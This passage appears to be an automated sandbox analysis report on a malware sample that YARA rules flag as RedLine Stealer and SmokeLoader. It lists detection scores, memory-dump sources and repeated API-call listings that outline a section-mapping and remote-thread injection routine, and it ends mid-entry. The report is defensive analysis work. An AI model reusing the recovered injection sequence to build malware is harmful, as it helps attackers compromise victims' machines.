    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
    Antivirus matches:
    • Detection: 100%, Joe Sandbox ML
    • Detection: 74%, ReversingLabs
    • Detection: 77%, Virustotal, Browse
    Reputation:low
    Has exited:true


      Execution Graph

      Execution Coverage:6.5%
      Dynamic/Decrypted Code Coverage:37.8%
      Signature Coverage:55.6%
      Total number of Nodes:90
      Total number of Limit Nodes:4
      execution_graph: node/edge serialization of the execution graph (not reproduced). API calls recoverable from the node labels: 0x401608 NtDuplicateObject; 0x401625, 0x4016a5, 0x4016be NtCreateSection; 0x40164b, 0x40166e, 0x4016db, 0x401702 NtMapViewOfSection; 0x4030ea RtlCreateUserThread, NtTerminateProcess; 0x2bb0e0f SetErrorMode (twice); 0x2bb02ce VirtualProtect; 0x2bb0439 VirtualFree; 0x2bb04be LoadLibraryA; 0x2bb0dbb, 0x2bb092b GetPEB; 0x2bb0238, 0x2d092d4 VirtualAlloc; 0x401991 Sleep; 0x2d095fd CreateToolhelp32Snapshot; 0x2d09619 Module32First. Aggregated nodes: 0x40193e (11 API calls), 0x401553 (10 API calls), 0x401729 (3 API calls).

      Control-flow Graph

      control_flow_graph: basic blocks 0x401553-0x40193b, entry 0x401553 (calls 0x4011cd, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 0x401729); executed/not-executed edge list not reproduced.
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
      • Opcode Fuzzy Hash: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66

      Control-flow Graph

      control_flow_graph: basic blocks 0x40156b-0x40193b, entry 0x40156b (calls 0x4011cd, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 0x401729); executed/not-executed edge list not reproduced.
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
      • Opcode Fuzzy Hash: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25

      Control-flow Graph

      control_flow_graph: basic blocks 0x401561-0x40193b, entry 0x401561 (calls 0x4011cd, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 0x401729); executed/not-executed edge list not reproduced.
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
      • Opcode Fuzzy Hash: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25

      Control-flow Graph

      control_flow_graph: basic blocks 0x40156f-0x40193b, entry 0x40156f (calls 0x4011cd, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 0x401729); executed/not-executed edge list not reproduced.
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
      • Opcode Fuzzy Hash: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24

      Control-flow Graph

      control_flow_graph: basic blocks 0x401583-0x40193b, entry 0x401583 (calls 0x4011cd, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 0x401729); executed/not-executed edge list not reproduced.
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
      • Opcode Fuzzy Hash: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64

      Control-flow Graph

      control_flow_graph: basic blocks 0x401587-0x40193b, entry 0x401587 (calls 0x4011cd, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 0x401729); executed/not-executed edge list not reproduced.
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
      • Opcode Fuzzy Hash: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24

      Control-flow Graph (graph rendering omitted)
      APIs
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create
      • String ID:
      • API String ID: 33071139-0
      • Opcode ID: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
      • Opcode Fuzzy Hash: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B

      Control-flow Graph (graph rendering omitted)
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateProcessTerminateThreadUser
      • String ID:
      • API String ID: 1921587553-0
      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction ID: 9349ae55c142a47270c9c73eabb89239111d3cd47c98212c67b606f4e0ccd907
      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction Fuzzy Hash: C5412531218E088FD7A8EF6CA88576377D5F798311F6643AAE809D3389EA34DC5187C5

      Control-flow Graph (graph rendering omitted)
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D09601
      • Module32First.KERNEL32(00000000,00000224), ref: 02D09621
      Memory Dump Source
      • Source File: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D02000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2d02000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: CreateFirstModule32SnapshotToolhelp32
      • String ID:
      • API String ID: 3833638111-0
      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction ID: 2621f8ee4875ddfb2f2830e9944a9894e2242617f7cb69cf105f32edb44c8235
      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction Fuzzy Hash: 89F096311007156BE7203BF5A8DCBEE76FCEF49B28F540528E642925D1DB70EC458A61

      Control-flow Graph (graph rendering omitted)
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BB024D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID: cess$kernel32.dll
      • API String ID: 4275171209-1230238691
      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction ID: c90a2213fb2bd0054ee305e824e992234aa60f2696ebabc1bc8932e0190e7174
      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction Fuzzy Hash: 95527974A00229DFDB65CF68C984BADBBB1BF09304F1484D9E94DAB351DB70AA84CF14

      Control-flow Graph (graph rendering omitted)
      APIs
      • SetErrorMode.KERNELBASE(00000400,?,?,02BB0223,?,?), ref: 02BB0E19
      • SetErrorMode.KERNELBASE(00000000,?,?,02BB0223,?,?), ref: 02BB0E1E
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: ErrorMode
      • String ID:
      • API String ID: 2340568224-0
      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction ID: 43804a22a99cfa038d1b1c2ebaa3f3077fc4812c5441b61ad954bd67a4bff1f0
      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction Fuzzy Hash: 01D0123554512877D7013A94DC09BDE7B1CDF09B66F008451FB0DD9080C7B0954046E5

      Control-flow Graph (graph rendering omitted)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
      • Opcode Fuzzy Hash: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B

      Control-flow Graph (graph rendering omitted)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
      • Opcode Fuzzy Hash: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B

      Control-flow Graph (graph rendering omitted)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
      • Opcode Fuzzy Hash: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B

      Control-flow Graph (graph rendering omitted)
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
      • Opcode Fuzzy Hash: 31aa609417ab5ed31c65507b96fd6a0431d30d29d70e2a4d28e260c8609d16a0
      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
      • Opcode Fuzzy Hash: 80a6c5373d62ebb69e6dd2ebfc7b7f41d0d957fd777d29198617fe32584c3506
      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D092E9
      Memory Dump Source
      • Source File: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D02000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2d02000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID:
      • API String ID: 4275171209-0
      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction ID: a60d0903171bb040df40a45acbfe08e2f279fbb6208a01b730564eeaa3839f7b
      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
      • Instruction Fuzzy Hash: 08112B79A00208EFDB01DF98C985E98BBF5EF08750F158094F9489B3A2D371EA50DF90
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
      • Opcode Fuzzy Hash: bcca46d5ef7268ad31bc33a501668355c47d000038c282039baec12a21f0baa8
      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
      • Opcode Fuzzy Hash: e9f86eb3684af82b782eaa40f954778cddddd88fa9debd0879e22657c53ef6f6
      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: .$GetProcAddress.$l
      • API String ID: 0-2784972518
      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
      • Instruction ID: 3dbabdb5a771a9396e0fce050b8c209f72aaead305440d692354e42e68afd913
      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
      • Instruction Fuzzy Hash: CC3168B6900609CFDB11DF99C880AEEBBF9FF08324F14448AD941A7250D7B1EA45CBA4
      Memory Dump Source
      • Source File: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D02000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2d02000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction ID: 9ce49a4fe96509cbbb473ee0bad67b5a8315427a618f0db5f00b6ec1a2e5d8d5
      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
      • Instruction Fuzzy Hash: 79115E72340100AFDB54DF65DCC1FA677EAEB89364B1980A9ED04CB3A5D676EC42CB60
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
      • Instruction ID: 141ebb122daae2a63aa486174569186e2aa7f2c15bce359390d8fa0b01a2a6c7
      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
      • Instruction Fuzzy Hash: 1701A276A106048FDF22EF24C805BFF33E5FF86216F4549E5D90A97281E7B4A9418B90
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
      • Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
